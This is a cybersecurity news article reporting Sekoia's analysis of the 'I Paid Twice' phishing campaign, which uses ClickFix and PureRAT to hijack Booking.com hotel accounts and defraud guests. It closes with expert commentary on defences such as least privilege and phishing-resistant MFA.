A new phishing campaign uncovered by analysts at sekoia.io is exploiting the hospitality industry at scale, targeting both Booking.com partners and their guests in a sophisticated, multi-stage fraud scheme.
Codenamed “I Paid Twice,” the operation combines infostealing malware, social engineering, and payment fraud, effectively turning compromised hotel accounts into launchpads for attacks against unsuspecting travellers.
Hotels as the First Breach Point
The campaign, active since at least April 2025, begins with spearphishing emails sent from compromised Booking.com partner accounts. These messages, often referencing genuine reservation IDs or guest requests, are convincing because they draw directly on real booking data that attackers had already stolen through earlier malware infections on hotel systems.
Once the hotel staff click the malicious link, they’re redirected through a ClickFix infection chain, a well-known social engineering tactic that exploits browser behavior to trick users into executing a PowerShell command. That command deploys PureRAT, a Remote Access Trojan sold on underground markets, giving attackers full control over the infected device, including login access to Booking.com’s professional extranet.
From Hotel Systems to Guests’ Wallets
With control of those Booking accounts, criminals move from infiltration to monetisation. Using the hotel’s legitimate Booking.com or WhatsApp channels, they contact real guests with believable messages, often referencing the exact reservation number, check-in date, and guest name.
Victims are told there’s been a “payment verification issue” and urged to confirm their banking details through what appears to be a Booking-branded payment page. The site is a near-perfect replica, complete with Booking typography and layout, but hosted behind Cloudflare protection on infrastructure traced to a Russian bulletproof hosting provider.
Once card details are entered, funds are siphoned directly to the attackers. As the report’s title suggests, victims end up paying twice, once to the hotel, and again to the fraudsters.
A Dangerous Pair
The technical analysis from Sekoia’s Threat Detection & Response (TDR) team shows that the ClickFix infection is not only a phishing ploy, but a delivery mechanism. Victims are tricked into copying and running a PowerShell command disguised as a CAPTCHA verification.
That command pulls down a ZIP archive containing PureRAT, a modular malware capable of remote desktop control, data theft, and surveillance. Once deployed, PureRAT establishes persistence via registry keys, operates filelessly in memory, and communicates over TLS-encrypted channels using ports 56001 to 56003.
PureRAT’s developer, “PureCoder,” markets the malware as a Malware-as-a-Service (MaaS) product via Telegram bots, further industrialising access to remote control tools for less-skilled attackers.
The Cybercrime Economy Behind the Attack
Sekoia’s investigation also exposed an extensive underground marketplace built around the hospitality sector. Compromised Booking.com credentials (including admin cookies and session tokens) are openly traded on Russian-speaking cybercrime forums such as LolzTeam, Exploit.in, and WWHClub.
Prices range from a few dollars for generic logs to several thousand for high-value accounts managing multiple hotels. Some threat actors even operate Telegram bots to buy Booking logs in bulk, offering profit-sharing models to traffers, distributors who specialise in driving infected traffic from social networks and search results.
One actor, using the alias “moderator_booking,” advertises that his team has made over $20 million in this ecosystem, purchasing Booking logs for $30 to $5000 each. Over time, the same tactics have expanded to target Expedia, Airbnb, and Agoda, as attackers diversify their reach.
Detection and Defence
Sekoia’s telemetry indicates multiple detection opportunities for defenders, particularly around PowerShell misuse, registry persistence, and anomalous use of AddInProcess32.exe, which PureRAT leverages to execute malicious .NET assemblies in memory.
The company’s Defend platform flags several distinctive behaviours, including unsigned DLLs in the AppData directory and suspicious PowerShell invocations downloading from HTTP links. These markers provide early-warning opportunities for SOC teams monitoring enterprise networks.
A Professionalised Fraud Model
Sekoia analysts conclude that this campaign reflects a broader, professionalised trend in cybercrime: turnkey fraud-as-a-service targeting the hospitality supply chain. Each step, from credential theft to guest phishing, is now an outsourced service in a global underground market.
By blending malware, social engineering, and real booking data, the “I Paid Twice” operation demonstrates how even trusted digital platforms can be weaponised against both businesses and consumers.
Sekoia says it will continue to track the infrastructure and actors behind the campaign, strengthening detection rules and sharing indicators of compromise with its customers.
No Shortage of Creativity
When it comes to social engineering and identity compromise threat actors have no shortage of creativity, these recent campaigns are a great example of that, says James Maude, Field CTO at BeyondTrust. “While the hook used is new the actual target is not, privileged accounts and credentials. The fact that in 2025 these types of attack are still successful speaks to the challenges of identity security we now face, where it just takes one credential, one identity, and the right level of privilege and access for an attacker to succeed.”
Many organizations struggle to deal with these constantly morphing attacks because they rely too heavily on detection, and increasingly, with these attack chains, there is little to detect, and by the time it is detected, the damage is done.
Maude says the physics of cyber security is very simple, the fewer privileges the user holds including the ability to launch unknown applications the less risk there is. “The reason cyber-attacks are on the rise, despite record investments in security technology, is due to the abundant identity attack surface in most organizations. We need to regain visibility and control of all our paths to privilege before threat actors find them for us.”
Some of the most effective defenses against these Click-Fix campaigns include removing local admin rights to mitigate the risk of malware impacting the entire system and application control to prevent unknown payloads and high-risk application like PowerShell from executing. These proactive measures can greatly reduce the attack surface and proactively mitigate a wide range of attack techniques, Maude adds.
Phishing-resistant MFA
Louis Eichenbaum, Federal CTO at ColorTokens says phishing attacks are nothing new. “Our adversaries have used them for years because they work and they continue to work. It only takes one user clicking a malicious link for an attacker to gain a foothold inside your network. Once in, they begin scanning, probing for weaknesses, and looking for pathways to move laterally toward high-value systems. And no matter how much awareness training you provide, there will always be someone who falls for a well-crafted phishing email.”
He says mitigating this risk starts with implementing phishing-resistant multi-factor authentication. “Even if an attacker steals credentials, they won’t be able to successfully use them. The next critical step is establishing an effective microsegmentation strategy. By identifying your most critical assets and placing security controls as close as possible to those systems, you dramatically reduce an attacker’s ability to move laterally inside your environment.”
The reality is simple: user laptops will be compromised. “But with phishing-resistant MFA and strong microsegmentation, you can ensure that even when an attacker gets in, they cannot reach or impact your mission-critical systems,” Eichenbaum adds.
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.